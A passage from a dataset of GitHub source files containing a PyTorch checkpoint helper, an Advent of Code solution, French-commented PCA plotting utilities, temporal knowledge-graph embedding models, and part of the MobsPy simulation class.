state[key]\n model.load_state_dict(state, strict=False)\n\n return model\n\n def save(self, directory: str):\n with self.checkpoint_path(directory).open('wb') as fp:\n torch.save({\n 'config': self.config,\n 'state': self.state_dict()\n }, fp)\n\n\n__all__ = ['CheckpointingModule']\n","repo_name":"rsk25/PCMG","sub_path":"model/base/chkpt.py","file_name":"chkpt.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"18752880318","text":"lines = open(\"input1.txt\").readlines()\n\nLEFT = \"L\"\nRIGHT = \"R\"\n\ninstructions = []\n\nfor instruction in lines[0]:\n\tinstructions.append(instruction)\ninstructions.pop(len(instructions) - 1)\n\npairs = [] #name, left, right\n\nfor line in lines:\n\tif line.find(\"=\") > 0:\n\t\tlineChunks = line.split()\n\t\tpairName = lineChunks[0]\n\t\tleft = lineChunks[2][1:4]\n\t\tright = lineChunks[3][0:3]\n\t\tpairs.append([pairName, left, right])\n\ncurrentName = \"AAA\"\ngoalName = \"ZZZ\"\nsteps = 0\n\n\ndone = False\nwhile not done:\n\tfor instruction in instructions:\n\t\tfor pair in pairs:\n\t\t\tpairName = pair[0]\n\t\t\tif pairName == currentName:\n\t\t\t\tif instruction == LEFT:\n\t\t\t\t\tcurrentName = pair[1]\n\t\t\t\telif instruction == RIGHT:\n\t\t\t\t\tcurrentName = pair[2]\n\t\t\t\tbreak\n\t\tsteps += 1\n\t\tif currentName == goalName:\n\t\t\tdone = True\n\nprint(steps)\n\n","repo_name":"PimClappers/AtfentufKood","sub_path":"2023/day8/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"25246747450","text":"import matplotlib.pyplot as plt\nfrom matplotlib.collections import LineCollection\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom scipy.cluster.hierarchy import dendrogram\n\n\ndef display_circles(pcs, n_comp, pca, axis_ranks, labels=None, label_rotation=0, lims=None):\n for d1, d2 in axis_ranks: # On affiche les 3 premiers plans factoriels, donc les 6 premières composantes\n if d2 < n_comp:\n\n # initialisation de la figure\n fig, ax = plt.subplots(figsize=(7,6))\n\n # détermination des limites du graphique\n if lims is not None :\n xmin, xmax, ymin, ymax = lims\n elif pcs.shape[1] < 30 :\n xmin, xmax, ymin, ymax = -1, 1, -1, 1\n else :\n xmin, xmax, ymin, ymax = min(pcs[d1,:]), max(pcs[d1,:]), min(pcs[d2,:]), max(pcs[d2,:])\n\n # affichage des flèches\n # s'il y a plus de 30 flèches, on n'affiche pas le triangle à leur extrémité\n if pcs.shape[1] < 30 :\n plt.quiver(np.zeros(pcs.shape[1]), np.zeros(pcs.shape[1]),\n pcs[d1,:], pcs[d2,:], \n angles='xy', scale_units='xy', scale=1, color=\"grey\")\n # (voir la doc : https://matplotlib.org/api/_as_gen/matplotlib.pyplot.quiver.html)\n else:\n lines = [[[0,0],[x,y]] for x,y in pcs[[d1,d2]].T]\n ax.add_collection(LineCollection(lines, axes=ax, alpha=.1, color='black'))\n \n # affichage des noms des variables \n if labels is not None: \n for i,(x, y) in enumerate(pcs[[d1,d2]].T):\n if x >= xmin and x <= xmax and y >= ymin and y <= ymax :\n plt.text(x, y, labels[i], fontsize='14', ha='center', va='center', rotation=label_rotation, color=\"blue\", alpha=0.5)\n \n # affichage du cercle\n circle = plt.Circle((0,0), 1, facecolor='none', edgecolor='b')\n plt.gca().add_artist(circle)\n\n # définition des limites du graphique\n plt.xlim(xmin, xmax)\n plt.ylim(ymin, ymax)\n \n # affichage des lignes horizontales et verticales\n plt.plot([-1, 1], [0, 0], color='grey', ls='--')\n plt.plot([0, 0], [-1, 1], color='grey', ls='--')\n\n # nom des axes, avec le pourcentage d'inertie expliqué\n plt.xlabel('F{} ({}%)'.format(d1+1, round(100*pca.explained_variance_ratio_[d1],1)))\n plt.ylabel('F{} ({}%)'.format(d2+1, round(100*pca.explained_variance_ratio_[d2],1)))\n\n plt.title(\"Cercle des corrélations (F{} et F{})\".format(d1+1, d2+1))\n plt.show(block=False)\n \ndef display_factorial_planes(X_projected, n_comp, pca, axis_ranks, labels=None, alpha=1, illustrative_var=None):\n for d1,d2 in axis_ranks:\n if d2 < n_comp:\n \n # initialisation de la figure \n fig = plt.figure(figsize=(7,6))\n \n # affichage des points\n if illustrative_var is None:\n plt.scatter(X_projected[:, d1], X_projected[:, d2], alpha=alpha)\n else:\n illustrative_var = np.array(illustrative_var)\n for value in np.unique(illustrative_var):\n selected = np.where(illustrative_var == value)\n plt.scatter(X_projected[selected, d1], X_projected[selected, d2], alpha=alpha, label=value)\n plt.legend()\n\n # affichage des labels des points\n if labels is not None:\n for i,(x,y) in enumerate(X_projected[:,[d1,d2]]):\n plt.text(x, y, labels[i],\n fontsize='14', ha='center',va='center') \n \n # détermination des limites du graphique\n boundary = np.max(np.abs(X_projected[:, [d1,d2]])) * 1.1\n plt.xlim([-boundary,boundary])\n plt.ylim([-boundary,boundary])\n \n # affichage des lignes horizontales et verticales\n plt.plot([-100, 100], [0, 0], color='grey', ls='--')\n plt.plot([0, 0], [-100, 100], color='grey', ls='--')\n\n # nom des axes, avec le pourcentage d'inertie expliqué\n plt.xlabel('F{} ({}%)'.format(d1+1, round(100*pca.explained_variance_ratio_[d1],1)))\n plt.ylabel('F{} ({}%)'.format(d2+1, round(100*pca.explained_variance_ratio_[d2],1)))\n\n plt.title(\"Projection des individus (sur F{} et F{})\".format(d1+1, d2+1))\n plt.show(block=False)\n\ndef display_scree_plot(pca):\n scree = pca.explained_variance_ratio_*100\n plt.bar(np.arange(len(scree))+1, scree)\n plt.plot(np.arange(len(scree))+1, scree.cumsum(),c=\"red\",marker='o')\n plt.xlabel(\"rang de l'axe d'inertie\")\n plt.ylabel(\"pourcentage d'inertie\")\n plt.title(\"Eboulis des valeurs propres\")\n plt.show(block=False)\n\ndef plot_dendrogram(Z, names):\n plt.figure(figsize=(10,25))\n plt.title('Hierarchical Clustering Dendrogram')\n plt.xlabel('distance')\n dendrogram(\n Z,\n labels = names,\n orientation = \"left\",\n )\n plt.show()\n\n# Afficher un tableau des pourcentages des valeurs NaN pour chaque colonne\ndef tableau_pourcentage_NaN(dataframe):\n pourcentage_valeur_naan = pd.DataFrame(\n dataframe.isna().mean().round(4) * 100,\n columns=['Données manquantes en %'\n ]).sort_values(by='Données manquantes en %', ascending=False)\n return (pourcentage_valeur_naan)\n\ndef graph_bar(df_pourcentage, column, titre, xlabel, ylabel):\n\n df_graphique = df_pourcentage.loc[:, [column, 'Nombre']].set_index(\n column)['Nombre'].copy()\n\n plt.figure(figsize=(15, 10))\n\n sns.set(style=\"whitegrid\")\n g = sns.barplot(x=df_graphique, y=df_graphique.index, orient='h')\n\n plt.title(titre, fontsize=20)\n plt.xlabel(xlabel, fontsize=14)\n plt.ylabel(ylabel, fontsize=14)\n\n # Afficher le nombre à droite du graphique à barres\n for i, v in enumerate(df_graphique.values.tolist()):\n g.text(v + 3, i + .25, str(v), color='black', fontweight='normal')\n\ndef graph_multivarie(column1, column2, title, df):\n df_selection = df[[column1, column2]]\n df_selection_top = df_selection.dropna()\n\n df_selection_pourcentage = df_selection_top.groupby([\n column2\n ]).size().reset_index(name='Nombre').sort_values('Nombre',\n ascending=False).head(50)\n rows = df_selection_top.shape[0]\n df_selection_pourcentage[\n 'Pourcentage'] = df_selection_pourcentage['Nombre'] / rows * 100\n\n dict_selection_pourcentage = {}\n\n liste_selection_50 = df_selection_pourcentage[column2].tolist()\n\n # Nous plaçons les valeurs de la colonne en clé et leurs moyennes en valeurs \n # dans le dictionnaire 'dict_selection_pourcentage'\n for i in liste_selection_50:\n a = df_selection.loc[df_selection[column2] == i]\n a = a[column1].mean()\n dict_selection_pourcentage[i] = a\n\n # Tri les valeurs du dictionnaire en ordre croissant\n liste_selection = sorted(dict_selection_pourcentage.items(),\n key=lambda x: x[1])\n\n # Top 10 des pays ayant les produits avec le meilleur nutriscore en moyenne\n liste_selection = liste_selection[:10]\n\n dict_moyenne_selection_10 = {}\n\n for i in liste_selection:\n dict_moyenne_selection_10[i[0]] = i[1]\n\n plt.figure(figsize=(15, 10), dpi=80)\n\n ind = np.arange(len(dict_moyenne_selection_10))\n palette = sns.color_palette(\"husl\", len(dict_moyenne_selection_10))\n\n plt.bar(ind, list(dict_moyenne_selection_10.values()), color=palette)\n plt.xticks(ind, list(dict_moyenne_selection_10.keys()))\n plt.title(title)\n plt.show()\n\n return dict_moyenne_selection_10\n\n","repo_name":"reda76/sante-publique-france","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":7834,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"14058165959","text":"import torch\nimport torch.nn as nn\nfrom abc import ABC, abstractmethod\nfrom typing import Tuple, List, Dict\nimport torch.nn.functional as F\n\n\nclass TKGE(nn.Module, ABC):\n def __init__(self, sizes, rank, margin, bias, init_size):\n super(TKGE, self).__init__()\n self.sizes = sizes\n self.rank = rank\n self.bias = bias\n self.init_size = init_size\n self.margin = torch.Tensor([margin])\n\n @abstractmethod\n def get_queries(self, x_data, eval_mode):\n pass\n\n def score(self, lhs, rhs, eval_mode=False):\n lhs_e, lhs_biases = lhs # head, relation, timestamp\n rhs_e, rhs_biases = rhs # tail\n score = -torch.norm(lhs_e - rhs_e, dim=1)\n if self.bias == 'constant':\n return self.margin.item() + score\n elif self.bias == 'learn':\n if eval_mode:\n return x_biases + y_biases.t() + score\n else:\n return x_biases + y_biases + score\n else:\n return score\n\n def forward(self, x_data, eval_mode=False):\n # get embeddings and similarity scores\n lhs_e, rhs_e, lhs_biases, rhs_biases, factors = self.get_queries(x_data)\n\n predictions = self.score((lhs_e, lhs_biases), (rhs_e, rhs_biases), eval_mode)\n\n return predictions, factors\n\nclass BaseE(TKGE):\n def __init__(self, args):\n super(BaseE, self).__init__(args.sizes, args.rank, args.margin, args.bias,args.init_size)\n\n def marginrankingloss(self, positive_score, negative_score):\n if torch.cuda.is_available():\n rl = nn.ReLU().cuda()\n l = torch.sum(rl(negative_score - positive_score))\n else:\n rl = nn.ReLU()\n l = torch.sum(rl(negative_score - positive_score))\n return l\n\n def loglikelihoodloss(self, positive_score, negative_score):\n positive_sample_loss = -F.logsigmoid(positive_score).mean()\n negative_sample_loss = -F.logsigmoid(-negative_score).mean()\n l = (positive_sample_loss + negative_sample_loss) / 2\n return l\n\nclass NaiveTransE(BaseE):\n \"\"\"Euclidean translations https://www.utc.fr/~bordesan/dokuwiki/_media/en/transe_nips13.pdf\"\"\"\n def __init__(self, args):\n super(NaiveTransE, self).__init__(args)\n\n self.embeddings = nn.ModuleList([])\n self.embeddings.append(nn.Embedding(self.sizes[0],self.rank))\n self.embeddings.append(nn.Embedding(self.sizes[1],self.rank//2))\n self.embeddings.append(nn.Embedding(self.sizes[3],self.rank//2))\n\n self.bh = nn.Embedding(self.sizes[0], 1)\n self.bh.weight.data = torch.zeros((self.sizes[0], 1))\n self.bt = nn.Embedding(self.sizes[0], 1)\n self.bt.weight.data = torch.zeros((self.sizes[0], 1))\n\n # entities\n self.embeddings[0].weight.data = self.init_size * torch.randn((self.sizes[0], self.rank))\n # relations: half dimension because of concatenation\n self.embeddings[1].weight.data = self.init_size * torch.randn((self.sizes[0], self.rank//2))\n # timestamps: half dimension because of concatenation\n self.embeddings[2].weight.data = self.init_size * torch.randn((self.sizes[0], self.rank//2))\n\n def get_queries(self, x_data, eval_mode = False):\n head_e = self.embeddings[0](x_data[:,0])\n rel_e = self.embeddings[1](x_data[:,1])\n ts_e = self.embeddings[2](x_data[:,3])\n lhs_biases = self.bh(x_data[:, 0])\n\n if eval_mode:\n tail_e, rhs_biases = self.embeddings[0].weight, self.bt.weight\n else:\n tail_e, rhs_biases = self.embeddings[0](x_data[:,2]), self.bt(x_data[:,2])\n\n lhs = head_e + torch.cat((rel_e, ts_e), dim=-1)\n rhs = tail_e\n # score = -torch.norm(head_e + torch.cat((rel_e,ts_e),dim=-1) - tail_e, dim=1)\n return lhs, rhs, lhs_biases, rhs_biases, [head_e, rel_e, tail_e, ts_e]\n\n\n\nclass VectorTransE(BaseE):\n \"\"\"Euclidean translations https://www.utc.fr/~bordesan/dokuwiki/_media/en/transe_nips13.pdf\"\"\"\n\n def __init__(self, args):\n super(VectorTransE, self).__init__(args)\n\n self.embeddings = nn.ModuleList([nn.Embedding(s, self.rank) for s in [self.sizes[0], self.sizes[1], self.sizes[3]]])\n # entities\n self.embeddings[0].weight.data = self.init_size * torch.randn((self.sizes[0], self.rank))\n # relations\n self.embeddings[1].weight.data = self.init_size * torch.randn((self.sizes[0], self.rank))\n # timestamps\n self.embeddings[2].weight.data = self.init_size * torch.randn((self.sizes[0], self.rank))\n\n self.bh = nn.Embedding(self.sizes[0], 1)\n self.bh.weight.data = torch.zeros((self.sizes[0], 1))\n self.bt = nn.Embedding(self.sizes[0], 1)\n self.bt.weight.data = torch.zeros((self.sizes[0], 1))\n\n def get_queries(self, x_data, eval_mode=False):\n head_e = self.embeddings[0](x_data[:, 0])\n rel_e = self.embeddings[1](x_data[:, 1])\n ts_e = self.embeddings[2](x_data[:, 3])\n x_biases = self.bh(x_data[:, 0])\n\n if eval_mode:\n tail_e, y_biases = self.embeddings[0].weight, self.bt.weight\n else:\n tail_e, y_biases = self.embeddings[0](x_data[:, 2]), self.bt(x_data[:, 2])\n\n x = head_e + rel_e + ts_e\n y = tail_e\n # score = -torch.norm(head_e + torch.cat((rel_e,ts_e),dim=-1) - tail_e, dim=1)\n return x, y, x_biases, y_biases, [head_e, rel_e, tail_e, ts_e]","repo_name":"p3DDah/DL_LAB","sub_path":"Topic 7/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"35945547305","text":"\"\"\"\n Main MobsPy module. It stocks the Simulation class which is responsible for simulating a Model\n\"\"\"\nfrom contextlib import contextmanager\nfrom mobspy.parameter_scripts import parameter_reader as pr\nfrom mobspy.parameters.default_reader import get_default_parameters\nfrom mobspy.parameters.example_reader import get_example_parameters\nimport mobspy.parameter_scripts.parametric_sweeps as ps\nfrom mobspy.plot_params.default_plot_reader import get_default_plot_parameters\nimport mobspy.sbml_simulator.builder as sbml_builder\nimport mobspy.sbml_simulator.run as sbml_run\nimport mobspy.plot_scripts.default_plots as dp\nimport mobspy.data_handler.process_result_data as dh\nfrom mobspy.data_handler.time_series_object import *\nfrom mobspy.modules.user_functions import *\nfrom mobspy.modules.set_counts_module import set_counts\nimport json\nimport os\nimport inspect\nimport mobspy.modules.unit_handler as uh\nfrom pint import UnitRegistry\nfrom joblib import Parallel, delayed\nimport time\n\n\nclass Simulation:\n\n # Event Implementation\n @classmethod\n def event_compilation_error(cls):\n simlog.error('The event condition did not compile.\\n'\n 'Please make sure it follows the following format:\\n'\n 'For simple conditions - if C1 \\n'\n 'For and based condition - if (C1) & (C2)\\n'\n 'For or based conditions - if (C1) & (C2)\\n'\n 'Please include the parentheses')\n\n def event_context_finish(self):\n self._event_time = 0\n Species.reset_simulation_context()\n self._species_to_set = set()\n self._context_not_active = True\n\n def event_context_add(self, time, trigger):\n\n event_data = {'event_time': time, 'event_counts': list(self.current_event_count_data),\n 'trigger': trigger}\n\n self.current_event_count_data = []\n self.pre_number_of_context_comparisons = self.number_of_context_comparisons\n self.number_of_context_comparisons = 0\n\n if len(event_data['event_counts']) != 0:\n self.total_packed_events.append(event_data)\n\n self.event_context_finish()\n\n def event_context_initiator(self):\n\n # Set context in all meta-species\n if len(self._species_to_set) == 0:\n Species.set_simulation_context(self)\n else:\n pass\n\n def _event_handler(self):\n if self._context_not_active:\n self._context_not_active = False\n self.__dict__['parameters']['_with_event'] = True\n self.event_context_initiator()\n else:\n simlog.error('MobsPy does not support multiple context calls')\n\n @contextmanager\n def event_condition(self, trigger, delay=0):\n try:\n code_line = inspect.stack()[2].code_context[0][:-1]\n if '==' in code_line:\n simlog.error('Equality comparison operator (==) not allowed for MobsPy events \\n' +\n 'Please use (A <= n) & (A >= n) if necessary', stack_index=3)\n if type(trigger) == bool or type(trigger) == float or type(trigger) == int:\n simlog.error(f'MobsPy has received an invalid trigger type: {type(trigger)} \\n' +\n f'Please make sure you are not using the operator == for creating event conditions \\n'\n , stack_index=3)\n self._conditional_event = True\n self._event_handler()\n yield 0\n finally:\n delay = uh.convert_time(delay)\n self._conditional_event = False\n self.event_context_add(delay, trigger)\n\n @contextmanager\n def event_time(self, time):\n try:\n self._event_handler()\n yield 0\n finally:\n time = uh.convert_time(time)\n self.event_context_add(time, 'true')\n\n def __init__(self, model, names=None, parameters=None, plot_parameters=None):\n \"\"\"\n Constructor of the simulation object\n\n Parameters:\n :param model: (List_Species object) Meta-Species object for modeling\n :param names: (dict) names of the meta-species in globals() format. If none it uses the variable names\n :param parameters: (dict) Simulation object parameters. If none takes default parameters\n :param plot_parameters: (dict) Parameters for plotting. If none takes default\n \"\"\"\n\n # Event Variable Definitions\n self._species_to_set = set()\n self._event_time = 0\n self.previous_trigger = None\n self.current_event_count_data = []\n self.total_packed_events = []\n self.number_of_context_comparisons = 0\n self.pre_number_of_context_comparisons = 0\n self._list_of_models = []\n self._list_of_parameters = []\n self._context_not_active = True\n self._assigned_species_list = []\n self._conditional_event = False\n self._end_condition = None\n self.model_parameters = {}\n self.sbml_data_list = []\n self._parameter_list_of_dic = []\n\n # Must copy to avoid reference assignment\n self.model = List_Species(model)\n self.names = names\n\n if not isinstance(model, Species) and not isinstance(model, List_Species):\n simlog.error('Model must be formed only by Species objects or List_Species objects \\n'\n f'Model type {type(model)} and it is {model}')\n\n self.orthogonal_vector_structure = mcu.create_orthogonal_vector_structure(model)\n\n # Get all meta - reactions\n self._reactions_set = set()\n for spe_object in self.model:\n for reference in spe_object.get_references():\n self._reactions_set = self._reactions_set.union(reference.get_reactions())\n\n self._species_counts = []\n for spe_object in self.model:\n for count in spe_object.get_quantities():\n self._species_counts.append({'object': spe_object, 'characteristics': count['characteristics'],\n 'quantity': count['quantity']})\n\n if not parameters:\n self.parameters = get_default_parameters()\n\n if not plot_parameters:\n self.plot_parameters = get_default_plot_parameters()\n\n # Other needed things for simulating\n self.results = {}\n self.fres = {}\n self.default_order = Default\n\n self._species_for_sbml = None\n self._reactions_for_sbml = None\n self._parameters_for_sbml = None\n self._mappings_for_sbml = None\n self._events_for_sbml = None\n self.model_string = ''\n\n def compile(self, verbose=True):\n \"\"\"\n Compiler method that calls the Compiler class in the modules directory\n\n :param verbose: (bool) = print or not the results of the compilation\n \"\"\"\n simlog.global_simlog_level = self.parameters['level']\n simlog.debug('Compiling model')\n\n pr.parameter_process(self.parameters)\n if self.parameters['method'] is not None:\n self.parameters['simulation_method'] = self.parameters['method']\n\n if self.parameters['simulation_method'].lower() == 'deterministic':\n self.plot_parameters['simulation_method'] = 'deterministic'\n elif self.parameters['simulation_method'].lower() == 'stochastic':\n self.plot_parameters['simulation_method'] = 'stochastic'\n\n # Pass end condition to dict parameters - It is stored outside of parameters to the parameters serializable\n # However, it is necessary for the compilation so it is passed as a parameter\n self.parameters['_end_condition'] = self._end_condition\n\n self._species_for_sbml, self._reactions_for_sbml, \\\n self._parameters_for_sbml, self._mappings_for_sbml, \\\n self.model_string, self._events_for_sbml, self._assigned_species_list, \\\n self.model_parameters = \\\n Compiler.compile(self.model,\n reactions_set=self._reactions_set,\n species_counts=self._species_counts,\n orthogonal_vector_structure=self.orthogonal_vector_structure,\n volume=self.parameters['volume'],\n type_of_model=self.parameters[\n \"simulation_method\"],\n verbose=verbose,\n event_dictionary=self.total_packed_events,\n continuous_sim=self.parameters['_continuous_simulation'],\n ending_condition=self.parameters['_end_condition'],\n skip_expression_check=self.parameters['skip_expression_check'])\n\n # The volume is converted to the proper unit at the compiler level\n self.parameters['volume'] = self._parameters_for_sbml['volume'][0]\n self.mappings = deepcopy(self._mappings_for_sbml)\n\n # Set common parameters for plot and simulation\n self.plot_parameters['unit_x'] = self.parameters['unit_x']\n self.plot_parameters['unit_y'] = self.parameters['unit_y']\n self.plot_parameters['output_concentration'] = self.parameters['output_concentration']\n\n self.all_species_not_mapped = {}\n for key in self._species_for_sbml:\n self.all_species_not_mapped[key.replace('_dot_', '.')] = self._species_for_sbml[key]\n\n self._list_of_models += [{'species_for_sbml': self._species_for_sbml,\n 'parameters_for_sbml': self._parameters_for_sbml,\n 'reactions_for_sbml': self._reactions_for_sbml,\n 'events_for_sbml': self._events_for_sbml,\n 'species_not_mapped': self.all_species_not_mapped,\n 'mappings': self.mappings,\n 'assigned_species': self._assigned_species_list}]\n\n self._list_of_parameters = [self.parameters]\n\n if self.model_string != '':\n return self.model_string\n\n def _assemble_multi_simulation_structure(self):\n\n if not self.sbml_data_list:\n data_for_sbml_construction, parameter_list_of_dic = ps.generate_all_sbml_models(self.model_parameters,\n self._list_of_models)\n self.sbml_data_list = data_for_sbml_construction\n self._parameter_list_of_dic = parameter_list_of_dic\n\n def run(self):\n \"\"\"\n Runs the simulation by colling the models in the sbml_simulator directory.\n Compiles the model if it was not yet compiled\n \"\"\"\n # Base case - If there are no events we compile the model here\n if self._species_for_sbml is None:\n self.compile(verbose=False)\n\n self._assemble_multi_simulation_structure()\n\n simlog.debug('Starting Simulator')\n jobs = self.set_job_number(self.parameters)\n simulation_function = lambda x: sbml_run.simulate(jobs, self._list_of_parameters, x)\n results = Parallel(n_jobs=jobs, prefer=\"threads\")(delayed(simulation_function)(sbml)\n for sbml in self.sbml_data_list)\n\n simlog.debug(\"Simulation is Over\")\n\n def convert_one_ts_to_desired_unit(unconverted_data):\n # Convert all the data from a single ts to desired unit\n return dh.convert_data_to_desired_unit(unconverted_data, self.parameters['unit_x'],\n self.parameters['unit_y'],\n self.parameters['output_concentration'],\n self.parameters['volume'])\n\n def convert_all_ts_to_correct_format(single_ts, parameters, unit_convert=False):\n # Convert multiple ts_data into correct format\n if unit_convert:\n data_dict = {'data': convert_one_ts_to_desired_unit(single_ts),\n 'params': self.parameters,\n 'models': self._list_of_models}\n else:\n data_dict = {'data': single_ts,\n 'params': self.parameters,\n 'models': self._list_of_models}\n return MobsPyTimeSeries(data_dict, parameters)\n\n flatt_ts = []\n if self._parameter_list_of_dic:\n for r, params in zip(results, self._parameter_list_of_dic):\n for ts in r:\n flatt_ts.append((ts, params))\n else:\n for r in results:\n for ts in r:\n flatt_ts.append((ts, {}))\n\n ta = self.parameters['unit_x'] is not None\n tb = self.parameters['unit_y'] is not None\n tc = self.parameters['output_concentration']\n\n if ta or tb or tc:\n all_processed_data = Parallel(n_jobs=jobs, prefer=\"threads\") \\\n (delayed(convert_all_ts_to_correct_format)(ts, params, True) for ts, params in flatt_ts)\n else:\n all_processed_data = Parallel(n_jobs=jobs, prefer=\"threads\") \\\n (delayed(convert_all_ts_to_correct_format)(ts, params, False) for ts, params in flatt_ts)\n\n self.results = MobsPyList_of_TS(all_processed_data)\n self.fres = MobsPyList_of_TS([all_processed_data[0]], True)\n\n if self.parameters['save_data']:\n self.save_data()\n\n if self.parameters['plot_data']:\n methods_list = [x['simulation_method'] for x in self._list_of_parameters]\n\n if len(self._parameter_list_of_dic) > 1:\n self.plot_parametric()\n return 0\n\n if ('stochastic' in methods_list or 'directmethod' in methods_list) \\\n and self.parameters['repetitions'] > 1:\n self.plot_stochastic()\n else:\n self.plot_deterministic()\n\n def save_data(self, file=None):\n \"\"\"\n Saves the simulation result data to a file in json format\n\n :param file: (str) name of the file to save the data to. If none a default name is provided\n \"\"\"\n self._save_data(file=file)\n\n def _save_data(self, file=None):\n \"\"\"\n Save results manually into file. Useful for jupyter notebook users\n\n Parameters\n file (str) = name of the file to create and save JSON data\n \"\"\"\n if file is None:\n try:\n with open(self.parameters[\"absolute_output_file\"], 'w') as f:\n json.dump(self.results.to_dict(), f, indent=4)\n except Exception as e:\n simlog.warning(\"Error saving data. Potential solve: file name parameter\")\n simlog.warning(str(e))\n else:\n file += '.json'\n with open(file, 'w') as jf:\n json.dump(self.results.to_dict(), jf, indent=4)\n\n def _pack_data(self, time_series_data):\n \"\"\"\n Packs data from multiple simulations or external data into one simulation object\n\n :param time_series_data: (data in MobsPy format) data to be packed in the simulation object\n \"\"\"\n self.packed_data.append(time_series_data)\n\n # Dealing with parameters\n def set_from_json(self, file_name):\n \"\"\"\n Set simulation parameters from json file\n\n :param file_name: (str) name of the json file\n \"\"\"\n with open(file_name) as json_file:\n data = json.load(json_file)\n for key in data:\n self.__setattr__(key, data[key])\n\n def __setattr__(self, name, value):\n \"\"\"\n __setattr__ override. For setting simulation parameters using the _dot_ operator\n\n :param name: (str) name of the parameter to set\n :param value: value of the parameter\n \"\"\"\n white_list = ['default_order', 'volume', 'model', 'names', 'parameters', 'model_string',\n 'plot_parameters', 'results', '_species_for_sbml',\n '_reactions_for_sbml', '_parameters_for_sbml', '_mappings_for_sbml', 'mappings',\n 'all_species_not_mapped', 'self._species_for_sbml', 'self._reactions_for_sbml',\n 'self._parameters_for_sbml', 'self._mappings_for_sbml', 'self.model_string',\n 'event_times', 'event_models', 'event_count_dics', '_events_for_sbml',\n 'total_packed_events', 'species_initial_counts', '_species_to_set',\n '_event_time', 'previous_trigger', 'current_event_count_data',\n 'current_condition', 'current_event_trigger_data',\n 'number_of_context_comparisons', 'pre_number_of_context_comparisons', '_continuous_simulation',\n 'initial_duration', '_reactions_set', '_list_of_models', '_list_of_parameters',\n '_context_not_active', '_species_counts', '_assigned_species_list', '_conditional_event',\n '_end_condition', 'orthogonal_vector_structure', 'model_parameters', 'fres',\n 'sbml_data_list', '_parameter_list_of_dic']\n\n plotted_flag = False\n if name in white_list:\n self.__dict__[name] = value\n\n if 'plot_flag' in self.__dict__ and self.__dict__['plot_flag']:\n self.__dict__[\"plot_parameters\"][name] = value\n self.__dict__[\"plot_flag\"] = False\n plotted_flag = True\n\n if not plotted_flag:\n example_parameters = get_example_parameters()\n if name in example_parameters.keys():\n if name == 'duration':\n if type(value) == bool:\n simlog.error(f'MobsPy has received an invalid trigger type: {type(value)} \\n' +\n f'Please make sure you are not using the operator == for ' +\n f'creating event conditions \\n'\n , stack_index=2)\n\n if name == 'duration' and isinstance(value, MetaSpeciesLogicResolver):\n self.__dict__['parameters']['_continuous_simulation'] = True\n self.__dict__['_end_condition'] = value\n if 'initial_conditional_duration' not in self.__dict__['parameters']:\n self.__dict__['parameters']['initial_conditional_duration'] = 1\n else:\n self.__dict__['parameters'][name] = value\n elif name in white_list:\n pass\n else:\n simlog.error(f'Parameter {name} is not supported', stack_index=2)\n\n def __getattribute__(self, item):\n ta = item == 'results' and self.__dict__['results'] == {}\n tb = item == 'fres' and self.__dict__['fres'] == {}\n if ta or tb:\n simlog.error('The results were accessed before the execution of the simulation', stack_index=2)\n\n if item == 'plot_config':\n return self.__getattr__(item)\n\n return super().__getattribute__(item)\n\n def __getattr__(self, item):\n \"\"\"\n __getattr__ override. For the user to be able to set plot parameters as MySim.plot.parameter\n \"\"\"\n if item == 'plot_config':\n self.__dict__['plot_flag'] = True\n else:\n self.__dict__['plot_flag'] = False\n return self\n\n def configure_parameters(self, config):\n \"\"\"\n Configure simulation parameters from json file or dictionary\n\n :param file_name: (str) name of the json file\n \"\"\"\n self.parameters = self.__config_parameters(config)\n\n def configure_plot_parameters(self, config):\n \"\"\"\n Configure plot parameters from json file or dictionary\n\n :param file_name: (str) name of the json file\n \"\"\"\n self.plot_parameters = self.__config_parameters(config)\n\n @staticmethod\n def __config_parameters(config):\n \"\"\"\n Encapsulation for config_plot and config_parameters\n \"\"\"\n if type(config) == str:\n if os.path.splitext(config)[1] != '.json':\n simlog.error('Wrong file extension', stack_index=3)\n parameters_to_config = pr.read_json(config)\n elif type(config) == dict:\n parameters_to_config = config\n else:\n simlog.error(\"Parameters must be python dictionary or json file\", stack_index=3)\n return parameters_to_config\n\n # Plotting encapsulation\n def extract_plot_essentials(self, *species):\n \"\"\"\n Extract essential information for plotting\n\n :param species: (meta-species objects) meta-species objects to plot\n :return: species_strings (str) = species strings to be plotted, self.results = data resulting from the\n simulation, self.plot_parameters (dict) = parameters for plotting\n \"\"\"\n if not species:\n species_strings = set()\n for model in self._list_of_models:\n species_strings = species_strings.union(model['mappings'])\n else:\n species_strings = set()\n\n for spe in species:\n if isinstance(spe, Species):\n species_strings.add(str(spe))\n elif isinstance(spe, Reacting_Species):\n species_strings.add(str(spe))\n elif type(spe) == str:\n species_strings.add(spe)\n else:\n simlog.error('Only species objects or strings for plotting arguments', stack_index=4)\n\n return species_strings, self.results, self.plot_parameters\n\n def plot_stochastic(self, *species):\n \"\"\"\n Calls stochastic plot. See default_plots module in the plot_scripts directory\n\n :param species: (str or meta-species objects) list of species to be plotted\n \"\"\"\n plot_essentials = self.extract_plot_essentials(*species)\n dp.stochastic_plot(plot_essentials[0], plot_essentials[1], plot_essentials[2])\n\n def plot_deterministic(self, *species):\n \"\"\"\n Calls deterministic plot. See default_plots module in the plot_scripts directory\n\n :param species: (str or meta-species objects) list of species to be plotted\n \"\"\"\n plot_essentials = self.extract_plot_essentials(*species)\n dp.deterministic_plot(plot_essentials[0], plot_essentials[1], plot_essentials[2])\n\n def plot_parametric(self, *species):\n plot_essentials = self.extract_plot_essentials(*species)\n dp.parametric_plot(plot_essentials[0], plot_essentials[1], plot_essentials[2])\n\n def plot(self, *species):\n \"\"\"\n Another way of calling plot_deterministic for simplicity\n\n :param species: (str or meta-species objects) list of species to be plotted\n \"\"\"\n self.plot_deterministic(*species)\n\n def plot_raw(self, parameters_or_file):\n \"\"\"\n Calls raw plot. See 